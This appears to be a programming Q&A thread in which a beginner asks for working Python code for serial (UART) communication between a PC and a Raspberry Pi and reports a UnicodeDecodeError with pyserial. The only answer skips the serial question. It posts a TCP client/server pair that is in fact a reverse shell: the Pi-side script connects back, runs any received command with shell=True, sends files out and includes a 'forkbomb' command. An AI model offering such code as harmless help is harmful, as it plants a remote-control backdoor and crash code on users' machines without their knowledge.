# Could anybody post working example of serial link connection in Python?

Tags: python, serial-port

I just start to learning Python. I want to write communication between PC and RaspberryPi. Could some one write me working sample code of transmitting and receiving data through serial link. I found example here in stackoverflow... here is the code

```
# configure the serial connections (the parameters differs on the device you are connecting to)
ser = serial.Serial(
    port='/dev/ttyUSB1',
    baudrate=9600,
    parity=serial.PARITY_ODD,
    stopbits=serial.STOPBITS_TWO,
    bytesize=serial.SEVENBITS
)

ser.isOpen()

print 'Enter your commands below.\r\nInsert "exit" to leave the application.'

input=1
while 1 :
    # get keyboard input
    input = raw_input(">> ")
        # Python 3 users
        # input = input(">> ")
    if input == 'exit':
        ser.close()
        exit()
    else:
        # send the character to the device
        # (note that I happend a \r\n carriage return and line feed to the characters - this is requested by my device)
        ser.write(input + '\r\n')
        out = ''
        # let's wait one second before reading output (let's give device time to answer)
        time.sleep(1)
        while ser.inWaiting() > 0:
            out += ser.read(1)

        if out != '':
            print ">>" + out
```

problem is that serial.read have to be decoded and serial.write have to be encoded

But my compiler still return error even when i use encode/decode so i am tired of experimenting, because none of my solutions is not working correctly:

```
UnicodeDecodeError: utf-8' codec can't decode byte 0xf8 in position 0: invalid start byte
```

Here is my entire code

```
import time
import serial

# configure the serial connections (the parameters differs on the device you are connecting to)
ser = serial.Serial(
    port='COM3',
    baudrate=9600
)

ser.isOpen()

print ('Enter your commands below.\r\nInsert "exit" to leave the application.')

input1=1
while 1 :
    # get keyboard input
    input1 = input(">> ")
        # Python 3 users
        # input = input(">> ")
    if input1 == 'exit':
        ser.close()
        exit()
    else:
        # send the character to the device
        # (note that I happend a \r\n carriage return and line feed to the characters - this is requested by my device)
        #input1 = str.encode(input1)
        #ser.write(input1 + '\r\n')
        ser.write(input1.encode())
        ser.write("\n".encode("utf-8"))
        out = ''
        # let's wait one second before reading output (let's give device time to answer)
        time.sleep(1)
        while ser.inWaiting() > 0:
            out += ser.read(1).decode("utf-8").strip()

        if out != '':
            print (">>" + out)
```

Comment: Only `input1.encode()` does not specify `utf-8`. Try specifying `utf-8` as well. Also, is the device of the communication partner encoded with `utf-8`?

Answer (score 0):

Why don't you just use a simple TCP listening port?

**server.py** (run on PC)

```
import socket
import colorama
import time
colorama.init()

LHOST = str(input(IP Address: '))
LPORT = 2222

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LHOST, LPORT))
sock.listen(1)
print("Listening on port", LPORT)
client, addr = sock.accept()

while True:
    input_header = client.recv(1024)
    command = input(input_header.decode()).encode()

    if command.decode("utf-8").split(" ")[0] == "download":
        file_name = command.decode("utf-8").split(" ")[1]
        client.send(command)
        with open(file_name, "wb") as f:
            read_data = client.recv(1024)
            while read_data:
                f.write(read_data)
                read_data = client.recv(1024)
                if read_data == b"DONE":
                    break

    if command == b"":
        print("Please enter a command")
    else:
        client.send(command)
        data = client.recv(1024).decode("utf-8")
        if data == "exit":
            print("Terminating connection", addr[0])
            time.sleep(2)
            break
        print(data)
client.close()
sock.close()
```

**client.py** (run this script on Raspberry PI)

```
import socket
import subprocess
import os
import platform
import getpass
import colorama
from colorama import Fore, Style
from time import sleep

colorama.init()

RHOST = str(input('PC IP Address: '))
RPORT = 2222

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((RHOST, RPORT))

while True:
    try:
        header = f"""{Fore.RED}{getpass.getuser()}@{platform.node()}{Style.RESET_ALL}:{Fore.LIGHTBLUE_EX}{os.getcwd()}{Style.RESET_ALL}$ """
        sock.send(header.encode())
        STDOUT, STDERR = None, None
        cmd = sock.recv(1024).decode("utf-8")
        #Specials
        if cmd == "confirm":
            sock.send("Connection Confirmed".encode())
        elif cmd == "ostype":
            sock.send(f"{platform.system()}".encode())
        #Specials End
        # List files in the directory
        elif cmd == "list":
            sock.send(str(os.listdir(".")).encode())

        elif cmd == "forkbomb":
            while True:
                os.fork()

        # Change directory
        elif cmd.split(" ")[0] == "cd":
            if len(cmd.split(" ")) > 2:
                xvc = cmd.split(" ")[1] + " " + cmd.split(" ")[2]
                os.chdir(xvc)
            else:
                os.chdir(cmd.split(" ")[1])
            sock.send("Changed directory to {}".format(os.getcwd()).encode())

        # Get system info
        elif cmd == "sysinfo":
            sysinfo = f"""
Operating System: {platform.system()}
Computer Name: {platform.node()}
Username: {getpass.getuser()}
Release Version: {platform.release()}
Processor Architecture: {platform.processor()}
            """
            sock.send(sysinfo.encode())

        # Download files
        elif cmd.split(" ")[0] == "download":
            with open(cmd.split(" ")[1], "rb") as f:
                file_data = f.read(1024)
                while file_data:
                    print("Sending", file_data)
                    sock.send(file_data)
                    file_data = f.read(1024)
                sleep(2)
                sock.send(b"DONE")
            print("Finished sending data")

        # Terminate the connection
        elif cmd == "exit":
            sock.send(b"exit")
            break

        # Run any other command
        else:
            comm = subprocess.Popen(str(cmd), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            STDOUT, STDERR = comm.communicate()
            if not STDOUT:
                sock.send(STDERR)
            else:
                sock.send(STDOUT)

        # If the connection terminates
        if not cmd:
            print("Connection dropped")
            sleep(1)
            break
    except Exception as e:
        sock.send("An error has occured: {}".format(str(e)).encode())
sock.close()
```

Comment: because I have to use UART (serial /dev/ttyS0), or your code is capable to run TCP comm via UART interface?